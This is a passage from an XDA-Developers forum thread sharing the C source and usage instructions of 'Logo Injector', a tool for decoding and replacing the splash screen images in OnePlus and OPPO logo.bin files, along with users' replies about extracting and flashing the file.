fseek(pngFile, 20, SEEK_SET);
fread(&height, 1, SIZEOFLONGINT, pngFile);
return(SWAP32(height));
}
uint64_t BlockIt(uint32_t isize){
uint32_t blockSize = BLOCK;
if ((isize % blockSize) == 0){
return isize;
}else{
return isize + (blockSize - (isize % blockSize));
}
}
void Usage(){
fprintf(stdout, "Usage: logoinjector -i \"input file\" [-l] | [-L] | [-d [-s]] | [-j \"image to be replaced\" [-b] | [-s]]\n\n");
fprintf(stdout, "Mandatory Arguments:\n\n");
fprintf(stdout, "\t-i \"C:\\xda\\logo.bin\"\n");
fprintf(stdout, "\t This is the logo.bin file to analyze or inject an image\n\n");
fprintf(stdout, "Optional Arguments:\n\n");
fprintf(stdout, "\t-d Decode all images into PNGs, (-s)wap parameter may be needed for proper color.\n");
fprintf(stdout, "\t-l Lower case 'L' is to display a short list of what is inside the input file.\n");
fprintf(stdout, "\t-L Upper case 'L' is for a more detailed list of logo.bin image contents.\n");
fprintf(stdout, "\t-b 'b' is used to tell the program to disregard width or height differences\n");
fprintf(stdout, "\t when encoding an image, the program also won't fail if it can't find a name\n");
fprintf(stdout, "\t that can't be found on the inject list when encoding images\n");
fprintf(stdout, "\t-s 's' is used to swap RGB and BGR color order. Can be used on decoding or encoding.\n");
fprintf(stdout, "\t NEW IN THIS V1.2: Swap is on by default, meaning the color order will be BGR. Using\n");
fprintf(stdout, "\t the \"-s\" switch will result in a RGB color order. Bottom line: If you (-d)ecode the\n");
fprintf(stdout, "\t images (that have color) and the colors aren't right, then you should use (-s) to \n");
fprintf(stdout, "\t decode and inject images.\n");
fprintf(stdout, "\t-j \"image(s) to be replaced\"\n");
fprintf(stdout, "\t The image(s) name to be replaced as seen in the (-l)ist\n");
fprintf(stdout, "\t NEW IN THIS V1.2: Multiple image names may be put after \"-j\"\n");
fprintf(stdout, "\t The names simply need to be separated by a space. The names now also are not case\n");
fprintf(stdout, "\t sensitive, and it doesn't matter if you put the extension at the end of the name.\n");
fprintf(stdout, "\t You actually only need to put the first characters of the name.\nExample:\n");
fprintf(stdout, "\t logoinjector -i \"your_logo.bin\" -j FHD \n\n");
fprintf(stdout, "\t This will inject a PNG for every name in the logo bin that begins with \"fhd\"\n");
return;
}
void PrintFileSize(uint32_t bytes){
float megaBytes = 0, kiloBytes = 0;
kiloBytes = (float)bytes / (float)TWOTOTHETEN;
megaBytes = kiloBytes / (float)TWOTOTHETEN;
if (kiloBytes < (float)TWOTOTHETEN){
fprintf(stdout, "\t%.2f KB\n", kiloBytes);
} else {
fprintf(stdout, "\t%.2f MB\n", megaBytes);
}
return;
}
uint32_t GetFileSize(FILE *temp){
fseek(temp, 0 , SEEK_END);
uint32_t fileSizeZ = ftell(temp);
return(fileSizeZ);
}
int32_t main(int32_t argc, int8_t **argv){
int32_t c;
int16_t h, i , j , k = 0;
FILE *originalLogoBin = NULL, *modifiedLogoBin = NULL;
uint8_t *inputFile = NULL;
uint8_t *injectNames[MAXOFFSETS];
int16_t decodeAllOpt = 0;
int16_t encodeOpt = 0;
int16_t inject = 0;
int16_t listFile = 0;
uint16_t numberOfOffsets = 0, injected = 0;
for(i = 0; i < MAXOFFSETS; i++){
injectNames[i] = NULL;
}
fprintf(stdout, "__________________________________________________________-_-\n");
fprintf(stdout, "Logo Injector v1.2\n\nWritten By Makers_Mark @ XDA-DEVELOPERS.COM\n");
fprintf(stdout, "_____________________________________________________________\n\n");
while ((c = getopt (argc, (char**)argv, "sSj:J:hHbBdDlLi:I:")) != -1){
switch(c)
{
case 'l':
listFile = 1;
break;
case 'L':
decodeAllOpt = 1;
convertToPNG = 0;
break;
case 'i':
case 'I':
inputFile = optarg;
break;
case 'b':
case 'B':
badAss = 1;
break;
case 'j':
case 'J':
h = optind - 1 ;
uint8_t *nextArg;
while(h < argc){
inject = 1;
nextArg = strdup(argv[h]);
h++;
if(nextArg[0] != '-'){
injectNames[k++] = nextArg;
} else {
break;
}
}
optind = h - 1;
break;
case 'd':
case 'D':
decodeAllOpt = 1 ;
break;
case 's':
case 'S':
rgb2bgr = -1 ;
break;
case 'h':
case 'H':
Usage();
return 0;
break;
default:
Usage();
return 0;
break;
}
}
if (inputFile == NULL){
Usage();
return 0;
}
fprintf(stdout, "FILE: %s\n_____________________________________________________________\n\n", inputFile);
if (rgb2bgr == 1){
fprintf(stdout, "BGR is the color order. Use \"-s\" switch to change it to RGB.\n\n");
} else {
fprintf(stdout, "RGB is the color order. Use \"-s\" switch to change it to BGR.\n\n");
}
if ((originalLogoBin = fopen(inputFile, "rb")) == NULL){
fprintf(stderr, "%s could not be opened\n", inputFile);
return 0;
}
if (!IsItALogo(originalLogoBin)){
fprintf(stdout, "\nThis is NOT a valid Logo.bin\n\n");
fclose(originalLogoBin);
return 0;
}
if (!IsItTheNewStyle(originalLogoBin)){
fprintf(stdout, "\nThis is the old style logo.bin\n\n");
fclose(originalLogoBin);
return 0;
}
numberOfOffsets = GetNumberOfOffsets(originalLogoBin);
IMAGEHEAD *imageHeaders = ParseHeaders(originalLogoBin, numberOfOffsets);
if (listFile){
ListFileDetails(originalLogoBin, imageHeaders);
return 1;
}
if(inject){
uint32_t ihMainOffsets[MAXOFFSETS];
uint8_t found = 0, exitFlag = 0;
for (i = 0; i < MAXOFFSETS ; i++){
ihMainOffsets[i] = 0;
}
for (j = 0; j < k ; j++){
for (i = 0 ; i < numberOfOffsets ; i++ ){
if((strcasecmp(imageHeaders[i].name, injectNames[j]) == 0) ||
(strncasecmp(imageHeaders[i].name, injectNames[j], strlen(injectNames[j])) == 0)){
found = 1;
break;
} else {
found = 0;
}
}
if (!found){
fprintf(stdout, "ERROR: \"%s\" is not in the logo bin !!!!\n", injectNames[j]);
exitFlag = 1;
}
}
if ((exitFlag) && (!badAss)){
fclose(originalLogoBin);
exit(0);
}
memcpy(&ihMainOffsets , &imageHeaders[0].offsets, SIZEOFLONGINT * MAXOFFSETS);
fseek(originalLogoBin, 0, SEEK_SET);
if ((modifiedLogoBin = fopen("modified.logo.bin", "wb+")) == NULL){
fclose(modifiedLogoBin);
fclose(originalLogoBin);
fprintf(stderr, "modified.logo.bin could not be opened\n");
return 0;
}
for (i = 0 ; i < numberOfOffsets ; i++ , injected = 0 ){
for (j = 0; j < k ; j++){
if((strcasecmp(imageHeaders[i].name, injectNames[j]) == 0) ||
(strncasecmp(imageHeaders[i].name, injectNames[j], strlen(injectNames[j])) == 0)){
if (InjectNewStyle(originalLogoBin, imageHeaders , numberOfOffsets, imageHeaders[i].name, i, modifiedLogoBin, ihMainOffsets) == 0){
fprintf(stderr, "Error: Injecting %s\n", imageHeaders[i].name);
fclose(originalLogoBin);
fclose(modifiedLogoBin);
return 0;
}
if ( i != numberOfOffsets - 1 ){
fseek(originalLogoBin, imageHeaders[0].offsets[i+1], SEEK_SET);
}
injected = 1;
break;
}
}
if (!injected){
Copy(originalLogoBin , imageHeaders, numberOfOffsets, i, modifiedLogoBin);
}
}
uint16_t modifiedNumberOfOffsets = 0;
if (GetNumberOfOffsets(modifiedLogoBin) != numberOfOffsets){
fprintf(stderr, "ERROR: The number of offsets doesn't match the Original file!!\n");
fclose(modifiedLogoBin);
if (!badAss){
unlink("modified.logo.bin");
}
exit(0);
}
fprintf(stdout, "\n\nContents of the NEW \"modified.logo.bin\":\n");
fprintf(stdout, "VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\n\n");
ListFileDetails(modifiedLogoBin, imageHeaders);
fprintf(stdout, "\n\n_____________________________________________________________\nOriginal filesize: ");
PrintFileSize(GetFileSize(originalLogoBin));
fprintf(stdout, "Modified filesize: ");
PrintFileSize(GetFileSize(modifiedLogoBin));
fprintf(stdout, "-------------------------------------------------------------\n");
fclose(originalLogoBin);
fclose(modifiedLogoBin);
return 1;
}
if (decodeAllOpt){
DecodeLogoBin(originalLogoBin, imageHeaders);
fclose(originalLogoBin);
return 1;
}
fclose(originalLogoBin);
return 1;
}
Interesting Can you tell me where do I find the logo.bin in my boot.img. I've extracted mine and don't see any sign of logo.bin. I own a OnePlus 2
shreyas.kukde said:
Interesting Can you tell me where do I find the logo.bin in my boot.img. I've extracted mine and don't see any sign of logo.bin. I own a OnePlus 2
Click to expand...
Click to collapse
Did you download a system image? If so, unzip it, and look for the folder "firmware-update". The logo.bin should be in there.
Works well for me! Thanks!
Grarak said:
Works well for me! Thanks!
Click to expand...
Click to collapse
Thanks!! Removed this:
This is untested on the oneplus 2, however I've looked at the logo.bin from your firmware and it is identical to the newer oneplus one logo.bin. Let me know! Thanks!​
Grarak said:
Works well for me! Thanks!
Click to expand...
Click to collapse
how did you flash your modified logo.bin? if done through "fastboot flash logo logo.bin" it just quits with this error:
Code:
target reported max download size of 536870912 bytes
sending 'logo' (1581 KB)...
OKAY [ 0.064s]
writing 'logo'...
FAILED (remote: partition table doesn't exist)
finished. total time: 0.085s
this also happens with an unmodified logo.bin
markus1540 said:
how did you flash your modified logo.bin? if done through "fastboot flash logo logo.bin" it just quits with this error:
Code:
target reported max download size of 536870912 bytes
sending 'logo' (1581 KB)...
OKAY [ 0.064s]
writing 'logo'...
FAILED (remote: partition table doesn't exist)
finished. total time: 0.085s
this also happens with an unmodified logo.bin
Click to expand...
Click to collapse
You have to flash "LOGO" partition and not "logo"
makers_mark said:
You have to flash "LOGO" partition and not "logo"
Click to expand...
Click to collapse
gotta love case sensitivity. thanks, it worked.
awesome mod
It worked, thanks
This will work with Stock Oneplus 2 rom too, right?
Edit:
Working fine with my Onelus2 too, just got logo.bin from my stock Oxygen rom. Thanks again.
From where can I extract my logo.bin from my phone? I dont have the stock rom with me. I need this from 1+2 if this works with it?
Sent from my "GT-I9300/1+1" powered by Carbon Rom & Boeffla/ak Kernel
Fueled by 7000mAh ZeroLemon Battery
Edit:
Working fine with my Onelus2 too, just got logo.bin from my stock Oxygen rom. Thanks again.
shreyas.kukde said:
Interesting Can you tell me where do I find the logo.bin in my boot.img. I've extracted mine and don't see any sign of logo.bin. I own a OnePlus 2
Click to expand...
Click to collapse
nicesoni_ash said:
From where can I extract my logo.bin from my phone? I dont have the stock rom with me. I need this from 1+2 if this works with it?
Click to expand...
Click to collapse
I went into changing the splash screen only after I'd already changed to custom rom ( bliss 6 ), so I didn't had any official OPT rom zip.
I tried to use the "logo.bin.p" from latest OTA updates FROM HERE... but the LogoInjector telling me that "This is NOT a valid Logo.bin".
Solution I found -> I managed to EXTRACT THE LOGO.BIN FILE FROM THE OPT ITSELF !!!
I got it right after I read about this command and saw the "updater-script" from one of the official OTA updates that included a hint about logo.bin place in the OPT internal storage :
apply_patch("EMMC:/dev/block/bootdevice/by-name/LOGO:305152:567b5d4deed7f4875809ae8b7f071ab38e5a94d5:305152:16c76f9c0cadf8be18eed0961dfbcf3b7bd0aacf",
"-", 16c76f9c0cadf8be18eed0961dfbcf3b7bd0aacf, 305152,
567b5d4deed7f4875809ae8b7f071ab38e5a94d5, package_extract_file("patch/firmware-update/logo.bin.p"));
Click to expand...
Click to collapse
so... how to extract to logo.bin ?
Note: If you don't know what you're doing - DO NOT DO IT ! DD command is DANGEROUS !
Using adb open shell and run the following command:
dd if=/dev/block/bootdevice/by-name/LOGO of=/sdcard/logo.bin bs=305152 count=1
Click to expand...
Click to collapse
This will create a "logo.bin" file inside the root of your internal memory aka /sdcard folder.
I got from that the following image files list:
Resolution - Offset - Name
1080x1920 | 0............ | fhd_oppo_1080_1920_result.raw ---> THE SPLASH IMAGE !!!
536x60.........| 65536 | fhd_at_536_60_result.raw
300x1020....| 75264 | fhd_charger_300_1020_result.raw
1080x1920 | 89600 | fhd_fastboot_1080_1920_result.raw ---> THE FASTBOOT IMAGE !!!
1080x1920 | 145920 | fhd_lowpower_1080_1920_result.raw
392x66 ........| 277504 | fhd_rf_392_66_result.raw
487x69 ........| 285184 | fhd_wlan_487_69_result.raw
Note, inorder to load the png to the logo.bin you need to rename the png you make as *.raw according to this list above.
Now... inorder to "flash" the logo.bin back to the OPT I use the attached zip.
you only need to add "logo.bin" to the root of this zip, then flash it through TWRP.
@makers_mark - once again, after your OPO development - Thanks A LOT for developing & sharing with us LogoInjector for the OPT as well
@makers_mark
Could you make one for oneplus3?
Thanks in advance.
logo.bin for oneplus3 is attached.

[MOD][SPLASH][OP3] Splash Screen Image Injector

This is a program that I wrote to decode the newer style "logo.bin" files used in some OPPO, and OnePlus devices. Recently I have updated it to work with the OnePlus 3. It is backwards compatible with the old encoding. Please read below so you can better understand this type of encoding being used:
What Is A Raw Image?
A raw image, whether it be a file or an image in memory, is simply pixel data. There is no extra information like width, height, name, end of line... Absolutely nothing, just pixel data. If you have an image that is raw and the resolution is 1080x1920 and you are using a typical RGB24 or BGR24 (like the ones used here), then your exact filesize or size in memory will be 1080x1920x3! We use 3 here because there is one byte for the R or red component, one for the G (green), and one for the B(blue).
What Is A Run Length Encoded Image?
A run length image encoding uses a count ;usually a single byte (char), 2 bytes (short int), or 4 bytes (long int); and then the pixel components. So instead of writing out 300 bytes of '0's to make a line of 100 black pixels. Black is RGB(0,0,0). You could encode this as 100, 0, 0, 0. And only use 4 bytes of data to get the exact same image as the 300 byte raw image. All the run length encoding I've found, except the Motorola style which is a little different, use a run length encoding that is pixel-oriented like this.
Now I've figured out this new one and it is a byte-oriented run length encoding. This is for runs of bytes, not pixels. You may think, well whats the big deal? When you add a little area of color, you increase the run length encoded image in you logo.bin immensely! You use 6 bytes per pixel if there aren't any runs of color data. If you had an image that was a 1080x1920 black image with a 25 pixel horizontal line in the middle. The encoder would be doing runs of black data efficiently until it reached the red area.
.....0 255 0 255 0 255 0 255 0 255 0 133 /// we've reached the top left corner of the red line /// 13 1 30 1 255 1 // << that was just one red pixel!! in bgr color order (13, 30, 255) <<// And it keeps going through the rest of the red pixels on that line using 6 bytes per pixel, which is the opposite of compression. Before reaching the red line the encoding was decoding to 255 zeros over and over, until finally 133 zeros. 255 zeros is 85 black pixels stored in just 2 bytes!
This type of encoding is ONLY good for grey scale images. It is not good with color, but it still will handle color of course. In grey scale, the Red, Blue, and Green data components are always the same values. All the way from black (0,0,0) to white (255, 255, 255); including every shade of grey in between>>>(1,1,1) (2,2,2) (3,3,3)....(243, 243, 243) (254, 254, 254)<<<
One other difference in this method of run length encoding is that the color byte is before the count, which is backwards from all of the other methods.​
The attachment contains the C source code (which is also in the 2nd post) and the executable that was compiled using mingw32 on a 64 bit Windows 10 PC. The PNG library that I used is LodePng, the source is in the download.
Big thanks to @scoobyjenkins for testing the old program on the op3 and sharing his results!! Also for testing this new version too!!
To use logoinjector:
Decode your logo.bin:
Code:
op3inject -i logo.bin -d
All the PNG 's will be extracted from logo.bin. Edit the PNG(s) that you want to change...
Note:
Your original "logo.bin" file is never changed, it is just read. If the file you try to load isn't a logo.bin file, or a different style, then the program will tell you and exit. This version is backwards compatible with the last OnePlus/OPPO encoding method. The only one it won't do, is the original one, that was not encoded, it was just pixel data.​
Inject the image(s) back in to the logo.bin:
Code:
op3inject -i logo.bin -j fhd_oppo fhd_at
To list whats in your logo file:
Code:
op3inject -i logo.bin -l
For a more detailed list:
Code:
op3inject -i logo.bin -L
If the colors are messed up use the "-s" switch while decoding.
Code:
op3inject -i logo.bin -d -s
If you had to use the "-s" switch to decode properly, you'll have to use it to inject also:
Code:
op3inject -i logo.bin -j image_name -s
Note:
You can put as many names after "-j" as you want, and it's not case sensitive. You also don't have to put the whole name. If you just put "-j fhd" every image in the logo.bin that starts with "fhd" will be injected. There has to be a PNG with the name in the directory though​
The size of your modified.logo.bin will displayed along with the original size, if everything went good. The 'splash' partition is 16 MB on the OnePlus 3. If you use too much color on too many of the 7 images you will easily go over 16 MB. The program will tell you and delete the "modified.logo.bin" that was created. If for some strange reason you would like to keep it, use the "-B" flag on the command.
Flash the "modified.logo.bin" file through fastboot.
Use this at your own risk.
Always make backups.
Always.
Code:
/*
* Logo Injector v1.4 aka OP3Inject
*
* Copyright (C) 2016 Joseph Andrew Fornecker
* makers_mark @ xda-developers.com
* [email protected]
*
* New in v1.2:
*
* - Fixed out of scope crash involving image #26 in oppo find 7 logo.bin (26 IS BIG)
* - Multiple injection names possible after the -j parameter
* - Injection names are now case insensitive
* - BGR is the the default color order, instead of RGB
* - Added more error checks
* - Show the change in file size of original logo.bin compare to the modified logo.bin
* - Several small changes dealing with readability
*
* New in v1.4:
*
* - Added the OnePlus 3's 4096 blocksize
* - General cleanup
* - Remains backwards compatible
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdint.h>
#include "lodepng.h"
#define SWAP32(x) (( x >> 24 )&0xff) | ((x << 8)&0xff0000) | ((x >> 8)&0xff00) | ((x << 24)&0xff000000)
#define OFFSETSTART 48
#define BYTESPERPIXEL 3
#define MAXOFFSETS 28
#define SIZEOFLONGINT 4
#define TWOTOTHETEN 1024
typedef struct {
uint8_t header[8];
uint8_t blank[24];
uint32_t width;
uint32_t height;
uint32_t lengthOfData;
uint32_t special;
uint32_t offsets[MAXOFFSETS];
uint8_t name[64];
uint8_t metaData[288];
} IMAGEHEAD;
uint16_t Copy(FILE *, IMAGEHEAD *, uint16_t , uint16_t, FILE *);
int32_t InjectNewStyle(FILE *, IMAGEHEAD *, uint16_t , uint8_t *, uint16_t, FILE *, uint32_t * );
int32_t RewriteHeaderZero( uint32_t , uint16_t, FILE* , int32_t, uint32_t * );
uint32_t Encode(uint8_t*, uint8_t*, uint32_t);
uint32_t GetEncodedSize(uint8_t*, uint32_t);
uint32_t GetWidth(FILE*);
uint32_t GetHeight(FILE*);
uint64_t BlockIt(uint32_t);
uint16_t GetNumberOfOffsets(FILE*);
int32_t DecodeLogoBin(FILE*, IMAGEHEAD *);
int32_t ListFileDetails(FILE*);
uint8_t* Decode(FILE*, uint32_t, uint32_t, uint32_t, uint8_t*);
int32_t IsItTheNewStyle(FILE*);
IMAGEHEAD* ParseHeaders(FILE*, uint16_t);
int32_t IsItALogo(FILE*);
void PrintFileSize(uint32_t);
uint32_t GetFileSize(FILE *);
uint16_t iBlock = 512;
uint16_t badAss = 0;
int16_t rgb2bgr = 1;
uint16_t convertToPNG = 1;
const uint8_t HEADER[] = {0x53,0x50,0x4C,0x41,0x53,0x48,0x21,0x21};
int32_t IsItALogo(FILE *originalLogoBin){
uint8_t string[9];
uint16_t i;
fread(string, 1, 8, originalLogoBin);
for (i = 0 ; i < 8 ; i++){
if (string[i] == HEADER[i]){
continue;
} else {
return 0;
}
}
return 1;
}
int32_t IsItTheNewStyle(FILE *originalLogoBin){
int32_t newStyle = 0;
int8_t j = 0;
fread(&newStyle, 1, SIZEOFLONGINT, originalLogoBin);
fseek(originalLogoBin, iBlock + 1, SEEK_SET);
fread(&j, 1, 1, originalLogoBin);
if (j == 0){
iBlock = 4096;
}
if (newStyle == 0){
return 1;
} else {
return 0;
}
}
IMAGEHEAD *ParseHeaders(FILE *originalLogoBin, uint16_t numberOfOffsets){
uint8_t i = 0;
IMAGEHEAD *imageHeaders;
imageHeaders = malloc(iBlock * numberOfOffsets);
memset(imageHeaders, 0, iBlock * numberOfOffsets);
fseek(originalLogoBin, 0, SEEK_SET);
fread(&imageHeaders[i], 1 , iBlock, originalLogoBin);
for ( i = 1 ; i < numberOfOffsets ; ++i ){
fseek(originalLogoBin, imageHeaders[0].offsets[i], SEEK_SET);
fread(&imageHeaders[i], 1 , iBlock, originalLogoBin);
}
return imageHeaders;
}
uint16_t GetNumberOfOffsets(FILE *originalLogoBin){
uint16_t i = 0;
uint32_t readAs = 0;
fseek(originalLogoBin, OFFSETSTART, SEEK_SET);
while(i < MAXOFFSETS){
fread(&readAs, 1, SIZEOFLONGINT, originalLogoBin);
if ((readAs == 0) && (i != 0)){
break;
} else {
i++;
}
}
return i;
}
uint8_t* Decode(FILE *originalLogoBin, uint32_t start, uint32_t length, uint32_t imageBytes, uint8_t* image){
uint32_t decodedBytes = 0, i = 0;
uint8_t* data;
fseek(originalLogoBin, start, SEEK_SET);
data = (uint8_t*)malloc(length);
if (fread(data, 1, length, originalLogoBin) != length) {
fprintf(stderr, "Could not read file!!\n");
exit(0);
}
while((i < length) && (decodedBytes < imageBytes)){
memset(&image[decodedBytes], data[i], (data[i + 1]));
decodedBytes += (uint8_t)data[i+1];
i += 2;
if ((i < length) && (imageBytes - decodedBytes < (uint8_t)data[i + 1])){
memset(&image[decodedBytes], data[i], imageBytes - decodedBytes);
decodedBytes = imageBytes;
fprintf(stdout, "More information was in encoding than resolution called for.\n");
break;
}
}
fprintf(stdout, "%ld decoded bytes\n\n", (long int)decodedBytes);
free(data);
if( rgb2bgr == 1 ){
uint8_t old;
i = 0;
while( i < imageBytes){
old = image[i];
memset(&image[i], image[i + 2], 1);
memset(&image[i + 2], old, 1);
i += BYTESPERPIXEL;
}
}
return image;
}
int32_t DecodeLogoBin(FILE *originalLogoBin, IMAGEHEAD *imageHeaders){
uint32_t imageBytes, start;
uint8_t* image;
uint8_t name[65];
uint16_t i , numberOfOffsets = GetNumberOfOffsets(originalLogoBin);
for ( i = 0 ; i < numberOfOffsets ; i++ ){
fprintf(stdout,"#%02d: Offset:%ld ", i + 1, (long int)imageHeaders[0].offsets[i]);
if ((imageHeaders[i].width == 0) || (imageHeaders[i].height == 0)){
fprintf(stdout, "Placeholder for %s\n", imageHeaders[i].metaData);
continue;
}
fprintf(stdout, "\nHeader=%s\nWidth=%ld\nHeight=%ld\nData Length=%ld\nSpecial=%ld\nName=%s\nMetadata=%s\n",
imageHeaders[i].header, (long int)imageHeaders[i].width, (long int)imageHeaders[i].height,
(long int)imageHeaders[i].lengthOfData, (long int)imageHeaders[i].special, imageHeaders[i].name, imageHeaders[i].metaData);
if (convertToPNG){
start = imageHeaders[0].offsets[i] + iBlock;
imageBytes = imageHeaders[i].width * (imageHeaders[i].height) * BYTESPERPIXEL;
image = malloc(imageBytes);
const char* ext;
ext = strrchr((const char*)imageHeaders[i].name, '.');
if (((ext[1] == 'p') || (ext[1] == 'P')) &&
((ext[2] == 'n') || (ext[2] == 'N')) &&
((ext[3] == 'g') || (ext[3] == 'G')) &&
((ext[0] == '.'))){
sprintf((char*)name, "%s", imageHeaders[i].name);
} else {
sprintf((char*)name, "%s.png", imageHeaders[i].name);
}
lodepng_encode24_file((const char*)name, Decode(originalLogoBin, (uint32_t)start, (uint32_t)imageHeaders[i].lengthOfData, (uint32_t)imageBytes, image) , (unsigned)imageHeaders[i].width, (unsigned)imageHeaders[i].height);
free(image);
}
}
return 0;
}
int32_t ListFileDetails(FILE *originalLogoBin){
uint32_t i = 0;
fseek(originalLogoBin, 0, SEEK_SET);
uint16_t numberOfOffsets = GetNumberOfOffsets(originalLogoBin);
IMAGEHEAD *imageHeaders = ParseHeaders(originalLogoBin, numberOfOffsets);
fprintf(stdout, "Resolution\tOffset\t\tName\n");
fprintf(stdout, "-------------------------------------------------------------\n");
for ( i = 0 ; i < numberOfOffsets ; i++ ){
if ((imageHeaders[i].width == 0) || (imageHeaders[i].height == 0)){
fprintf(stdout, "(placeholder) for %s\n", imageHeaders[i].metaData);
continue;
}
fprintf(stdout,"%dx%d\t", imageHeaders[i].width, imageHeaders[i].height);
if ((imageHeaders[i].width < 1000) && (imageHeaders[i].height <1000)){fprintf(stdout, "\t");}
fprintf(stdout, "%ld\t", (long int)imageHeaders[0].offsets[i]);
if (imageHeaders[0].offsets[i] < 10000000){fprintf(stdout, "\t");}
fprintf(stdout, "%s\n", imageHeaders[i].name );
}
return 1;
}
uint16_t Copy(FILE *originalLogoBin, IMAGEHEAD *imageHeaders, uint16_t numberOfOffsets, uint16_t injectionNumber, FILE *modifiedLogoBin){
uint8_t *data;
uint32_t imageSize = BlockIt(iBlock + imageHeaders[injectionNumber].lengthOfData);
if( imageHeaders[injectionNumber].name[0] == 0){
fprintf(stdout, "Copying \t#%d:(placeholder) %s\n", injectionNumber + 1 , imageHeaders[injectionNumber].metaData);
} else {
fprintf(stdout, "Copying \t#%d:%s\n", injectionNumber + 1 , imageHeaders[injectionNumber].name);
}
data = malloc(imageSize);
memset(data, 0 , imageSize);
fread(data, 1, imageSize, originalLogoBin);
fwrite(data, 1 , imageSize, modifiedLogoBin);
free(data);
return 1;
}
int32_t InjectNewStyle(FILE *originalLogoBin, IMAGEHEAD *imageHeaders, uint16_t numberOfOffsets, uint8_t *injectionName, uint16_t injectionNumber, FILE *modifiedLogoBin, uint32_t *ihMainOffsets ){
uint32_t encodedSize = 0, actualWritten = 0;
int8_t inFileName[69];
int32_t blockDifference;
FILE *pngFile;
uint16_t op3 = 0;
sprintf((char*)inFileName, "%s", injectionName);
if (imageHeaders[injectionNumber].special != 1){
fprintf(stdout, "ERROR: \"Special\" is not equal to '1' \nThis would not be safe to flash!\nPlease email logo.bin in question to:\[email protected]\n");
fclose(originalLogoBin);
fclose(modifiedLogoBin);
return 0;
}
if ((pngFile = fopen((const char*)inFileName, "rb")) == NULL){
sprintf((char*)inFileName, "%s.png", injectionName);
if ((pngFile = fopen((const char*)inFileName, "rb")) == NULL){
fclose(pngFile);
fclose(modifiedLogoBin);
fclose(originalLogoBin);
fprintf(stderr, "%s could not be read\n", inFileName);
return 0;
}
}
IMAGEHEAD new;
memset(new.blank, 0, sizeof(new.blank));
memset(new.metaData, 0, sizeof(new.metaData));
memset(new.offsets, 0, SIZEOFLONGINT * MAXOFFSETS);
memset(new.name, 0, sizeof(new.name));
strncpy((char*)new.header, (const char*)HEADER , 8);
strncpy((char*)new.metaData, (const char*)imageHeaders[injectionNumber].metaData, sizeof(imageHeaders[injectionNumber].metaData));
strncpy((char*)new.name, (const char*)injectionName, 64);
new.special = 1;
fprintf(stdout, "Injecting\t#%d:%s\n", injectionNumber + 1 , imageHeaders[injectionNumber].name);
if (((new.width = GetWidth(pngFile)) != imageHeaders[injectionNumber].width) && (!badAss)){
fprintf(stderr, "Error: Width of PNG to be injected is %d, it must be %d!\n", new.width, imageHeaders[injectionNumber].width);
fclose(pngFile);
fclose(modifiedLogoBin);
fclose(originalLogoBin);
return 0;
}
if (((new.height = GetHeight(pngFile)) != imageHeaders[injectionNumber].height) && (!badAss)){
fprintf(stderr, "Error: Height of PNG to be injected is %d, it must be %d!\n", new.height, imageHeaders[injectionNumber].height);
fclose(pngFile);
fclose(modifiedLogoBin);
fclose(originalLogoBin);
return 0;
}
uint32_t rawBytes = new.width * new.height * BYTESPERPIXEL;
uint8_t *decodedPNG = malloc(rawBytes);
lodepng_decode24_file(&decodedPNG, (uint32_t*)&new.width, (uint32_t*)&new.height , (const char*)inFileName);
if (rgb2bgr == 1){
uint8_t old;
uint32_t k = 0;
while( k < rawBytes ){
old = decodedPNG[k];
memset(&decodedPNG[k], decodedPNG[k + 2], 1);
memset(&decodedPNG[k + 2], old, 1);
k += BYTESPERPIXEL;
}
}
encodedSize = GetEncodedSize(decodedPNG, (new.width * new.height * BYTESPERPIXEL));
new.lengthOfData = encodedSize;
uint8_t *rlEncoded = malloc(BlockIt(encodedSize));
memset(rlEncoded, 0, BlockIt(encodedSize));
actualWritten = Encode(decodedPNG, rlEncoded, (new.width * new.height * BYTESPERPIXEL));
blockDifference = (((iBlock + BlockIt(actualWritten)) - (iBlock + BlockIt(imageHeaders[injectionNumber].lengthOfData))) / iBlock);
fwrite(&new, 1 , 512, modifiedLogoBin);
for (op3 = 0; op3 < iBlock - 512; op3++){
fputc(0, modifiedLogoBin);
}
fwrite(rlEncoded, 1 , BlockIt(actualWritten), modifiedLogoBin);
free(decodedPNG);
free(rlEncoded);
RewriteHeaderZero( injectionNumber , numberOfOffsets , modifiedLogoBin , blockDifference, ihMainOffsets);
fclose(pngFile);
return 1;
}
int32_t RewriteHeaderZero( uint32_t injectionImageNumber , uint16_t numberOfOffsets, FILE *modifiedLogoBin , int32_t blockDifference, uint32_t *ihMainOffsets){
uint8_t j = injectionImageNumber + 1 ;
uint32_t filePosition = ftell(modifiedLogoBin);
uint32_t offset = 0;
for( ; j < numberOfOffsets; j++){
fseek(modifiedLogoBin, OFFSETSTART + (SIZEOFLONGINT * j), SEEK_SET);
offset = ihMainOffsets[j];
offset += (blockDifference * iBlock);
fseek(modifiedLogoBin, OFFSETSTART + (SIZEOFLONGINT * j), SEEK_SET);
fwrite(&offset, 1 , SIZEOFLONGINT , modifiedLogoBin);
ihMainOffsets[j] = offset;
}
fseek(modifiedLogoBin, filePosition , SEEK_SET);
return 1;
}
uint32_t GetEncodedSize(uint8_t* data, uint32_t size){
uint32_t pos = 0, ret = 0;
uint16_t count = 1;
for( pos = 0 ; pos < size ; ++pos , count = 1){
while((pos < size - 1) && (count < 0xFF) && ((memcmp(&data[pos], &data[pos+1], 1)) == 0)){
count++;
pos++;
}
ret += 2;
}
return ret;
}
uint32_t Encode(uint8_t* rawRgbReading, uint8_t* rlEncoded, uint32_t rawSize){
uint32_t writePosition = 0 , readPosition = 0;
uint16_t count = 1;
for( readPosition = 0 ; readPosition < rawSize ; ++readPosition , count = 1){
while((readPosition < rawSize - 1 ) && (count < 0xFF) && ((memcmp(&rawRgbReading[readPosition], &rawRgbReading[readPosition+1], 1)) == 0)){
count++;
readPosition++;
}
rlEncoded[writePosition] = rawRgbReading[readPosition];
rlEncoded[writePosition + 1] = count;
writePosition += 2;
}
return writePosition;
}
uint32_t GetWidth(FILE *pngFile){
uint32_t width;
fseek(pngFile, 16, SEEK_SET);
fread(&width, 1, SIZEOFLONGINT, pngFile);
return(SWAP32(width));
}
uint32_t GetHeight(FILE *pngFile){
uint32_t height;
fseek(pngFile, 20, SEEK_SET);
fread(&height, 1, SIZEOFLONGINT, pngFile);
return(SWAP32(height));
}
uint64_t BlockIt(uint32_t isize){
uint32_t blockSize = iBlock;
if ((isize % blockSize) == 0){
return isize;
}else{
